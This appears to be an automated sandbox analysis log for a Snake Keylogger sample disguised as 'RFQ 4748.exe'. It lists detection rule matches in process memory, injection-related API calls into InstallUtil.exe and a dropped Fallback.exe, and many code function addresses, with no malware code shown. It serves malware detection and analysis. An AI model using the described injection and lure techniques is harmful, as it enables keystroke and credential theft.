                  Source: 00000000.00000002.2097379487.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.2097379487.0000000003F95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: 00000005.00000002.2303227720.000000000440D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000002.00000002.4492614618.0000000000408000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000000.00000002.2089151863.0000000003299000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: RFQ 4748.exe PID: 5272, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: RFQ 4748.exe PID: 5272, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: InstallUtil.exe PID: 360, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: Fallback.exe PID: 1096, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: Fallback.exe PID: 1096, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Source: Process Memory Space: InstallUtil.exe PID: 3652, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                  Initial sample is a PE file and has a suspicious name
                  Source: initial sampleStatic PE information: Filename: RFQ 4748.exe
                  Windows Scripting host queries suspicious COM object (likely to drop second stage)
                  Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AD8780 NtProtectVirtualMemory,0_2_06AD8780
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AD9BC0 NtResumeThread,0_2_06AD9BC0
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AD8778 NtProtectVirtualMemory,0_2_06AD8778
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AD9BB8 NtResumeThread,0_2_06AD9BB8
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AD9B2F NtResumeThread,0_2_06AD9B2F
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D98780 NtProtectVirtualMemory,5_2_06D98780
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D99BC0 NtResumeThread,5_2_06D99BC0
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D9877B NtProtectVirtualMemory,5_2_06D9877B
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D99BB8 NtResumeThread,5_2_06D99BB8
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D99B2F NtResumeThread,5_2_06D99B2F
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06C66E5B0_2_06C66E5B
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_012DB6E00_2_012DB6E0
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_012D2AB80_2_012D2AB8
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_012D72280_2_012D7228
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_012D72190_2_012D7219
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_012DB6D00_2_012DB6D0
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_012D7C280_2_012D7C28
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_012D7C380_2_012D7C38
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_0585BEAE0_2_0585BEAE
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_058540380_2_05854038
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AAE7180_2_06AAE718
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AAF4B00_2_06AAF4B0
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AAD6800_2_06AAD680
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AAE6E50_2_06AAE6E5
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AAE6F50_2_06AAE6F5
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AAE6450_2_06AAE645
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AA94180_2_06AA9418
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AAE1300_2_06AAE130
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AD51600_2_06AD5160
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AD87780_2_06AD8778
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06ADDC000_2_06ADDC00
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06ADDC100_2_06ADDC10
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06ADC2A90_2_06ADC2A9
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06ADDC100_2_06ADDC10
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AD1AE00_2_06AD1AE0
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AD1AD20_2_06AD1AD2
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06ADC1A00_2_06ADC1A0
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06ADC1B00_2_06ADC1B0
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AEEED00_2_06AEEED0
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AE00400_2_06AE0040
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AE19A30_2_06AE19A3
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AEEEC00_2_06AEEEC0
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AE5C480_2_06AE5C48
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AED2080_2_06AED208
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AED2180_2_06AED218
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AE7BA00_2_06AE7BA0
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06AE001E0_2_06AE001E
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06C5C7900_2_06C5C790
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06C581A00_2_06C581A0
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06C5DD880_2_06C5DD88
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06C5CAB70_2_06C5CAB7
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06C5921A0_2_06C5921A
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06C592200_2_06C59220
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06C500400_2_06C50040
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06C500060_2_06C50006
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06C581900_2_06C58190
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06F7E8E00_2_06F7E8E0
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06F600400_2_06F60040
                  Source: C:\Users\user\Desktop\RFQ 4748.exeCode function: 0_2_06F600070_2_06F60007
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_029FB3382_2_029FB338
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_029FF0172_2_029FF017
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_029F61202_2_029F6120
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_029F46D92_2_029F46D9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_029FB7E62_2_029FB7E6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_029F67482_2_029F6748
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_029FC7622_2_029FC762
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_029FC4572_2_029FC457
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_029FBAC22_2_029FBAC2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_029FCA422_2_029FCA42
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_029F98682_2_029F9868
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_029FBDA02_2_029FBDA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_029FC4802_2_029FC480
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_029FB5022_2_029FB502
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_029FE5382_2_029FE538
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_029FE5272_2_029FE527
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_029F35722_2_029F3572
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0660D6702_2_0660D670
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0660AA582_2_0660AA58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066086082_2_06608608
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0660B6E82_2_0660B6E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0660C3882_2_0660C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06608C512_2_06608C51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0660D0282_2_0660D028
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0660A4082_2_0660A408
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066008F02_2_066008F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0660B0A02_2_0660B0A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0660BD382_2_0660BD38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0660C9D82_2_0660C9D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066011A02_2_066011A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06605A602_2_06605A60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0660D6622_2_0660D662
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06605A702_2_06605A70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0660AA482_2_0660AA48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0660560A2_2_0660560A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066056182_2_06605618
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06605EC82_2_06605EC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0660B6D92_2_0660B6D9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06605EB82_2_06605EB8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066067782_2_06606778
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0660C3782_2_0660C378
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066063202_2_06606320
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066037302_2_06603730
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066063122_2_06606312
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0660A3F82_2_0660A3F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06606BC12_2_06606BC1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06606BD02_2_06606BD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066033A82_2_066033A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066033B82_2_066033B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066000402_2_06600040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066070402_2_06607040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066070502_2_06607050
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066044302_2_06604430
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066000062_2_06600006
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066028072_2_06602807
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066028182_2_06602818
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0660D0182_2_0660D018
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066008E02_2_066008E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066078F02_2_066078F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066074A82_2_066074A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066004882_2_06600488
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0660B08F2_2_0660B08F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066074972_2_06607497
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066004982_2_06600498
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06600D482_2_06600D48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06607D482_2_06607D48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06607D582_2_06607D58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0660BD282_2_0660BD28
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_06600D392_2_06600D39
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066079002_2_06607900
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066085FC2_2_066085FC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0660C9C82_2_0660C9C8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066081A02_2_066081A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066081B02_2_066081B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_0660518A2_2_0660518A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066011912_2_06601191
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 2_2_066051982_2_06605198
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_015734C05_2_015734C0
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_0157B6E05_2_0157B6E0
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_015772195_2_01577219
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_015772285_2_01577228
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_0157B6D05_2_0157B6D0
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_01577C385_2_01577C38
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_01577C285_2_01577C28
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_05C4A4AE5_2_05C4A4AE
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D6E7185_2_06D6E718
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D6F4B05_2_06D6F4B0
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D6E6F55_2_06D6E6F5
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D6E6E55_2_06D6E6E5
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D6D6805_2_06D6D680
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D6E6455_2_06D6E645
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D694185_2_06D69418
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D6E1305_2_06D6E130
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D951605_2_06D95160
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D9DC105_2_06D9DC10
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D9DC005_2_06D9DC00
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D91AD15_2_06D91AD1
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D91AE05_2_06D91AE0
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D9DC105_2_06D9DC10
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D9C2A95_2_06D9C2A9
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D9C1B05_2_06D9C1B0
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06D9C1A05_2_06D9C1A0
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06DAEED05_2_06DAEED0
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06DA00405_2_06DA0040
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06DA19A35_2_06DA19A3
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06DAEEC05_2_06DAEEC0
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06DA5C485_2_06DA5C48
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06DA5C335_2_06DA5C33
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06DAD2185_2_06DAD218
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06DAD2085_2_06DAD208
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06DA7BA05_2_06DA7BA0
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06DA001F5_2_06DA001F
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06F1C7905_2_06F1C790
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06F181A05_2_06F181A0
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06F1DD885_2_06F1DD88
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06F1CAB75_2_06F1CAB7
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06F192205_2_06F19220
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06F1921A5_2_06F1921A
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06F100405_2_06F10040
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06F100065_2_06F10006
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06F181905_2_06F18190
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06F700405_2_06F70040
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_06F700075_2_06F70007
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_0722003F5_2_0722003F
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_072200405_2_07220040
                  Source: C:\Users\user\AppData\Roaming\Fallback.exeCode function: 5_2_0723E8E05_2_0723E8E0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00ECF0076_2_00ECF007
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00ECC1906_2_00ECC190
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00EC61086_2_00EC6108
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00ECB3286_2_00ECB328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00ECC4706_2_00ECC470
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00ECC7536_2_00ECC753
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00EC68806_2_00EC6880
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00EC98586_2_00EC9858
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00EC4AD96_2_00EC4AD9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00ECCA336_2_00ECCA33
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00ECBBD36_2_00ECBBD3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00ECBEB06_2_00ECBEB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00ECB4F36_2_00ECB4F3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00EC35736_2_00EC3573
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00ECE5286_2_00ECE528
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_00ECE5176_2_00ECE517
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0641AA586_2_0641AA58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0641D6706_2_0641D670
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064186086_2_06418608
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0641B6E86_2_0641B6E8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0641C3886_2_0641C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06418C516_2_06418C51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0641A4086_2_0641A408
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0641D0286_2_0641D028
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0641B0A06_2_0641B0A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0641BD386_2_0641BD38
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0641C9D86_2_0641C9D8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064111A06_2_064111A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0641AA486_2_0641AA48
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06415A606_2_06415A60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0641D6626_2_0641D662
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06415A706_2_06415A70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064156096_2_06415609
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064156186_2_06415618
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06415EC86_2_06415EC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0641B6D96_2_0641B6D9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06415EB86_2_06415EB8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0641676A6_2_0641676A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064167786_2_06416778
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0641C3786_2_0641C378
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064163106_2_06416310
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064163206_2_06416320
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064137306_2_06413730
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06416BC16_2_06416BC1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_06416BD06_2_06416BD0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0641A3F86_2_0641A3F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064133A86_2_064133A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064133B86_2_064133B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064100406_2_06410040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_064170406_2_06417040
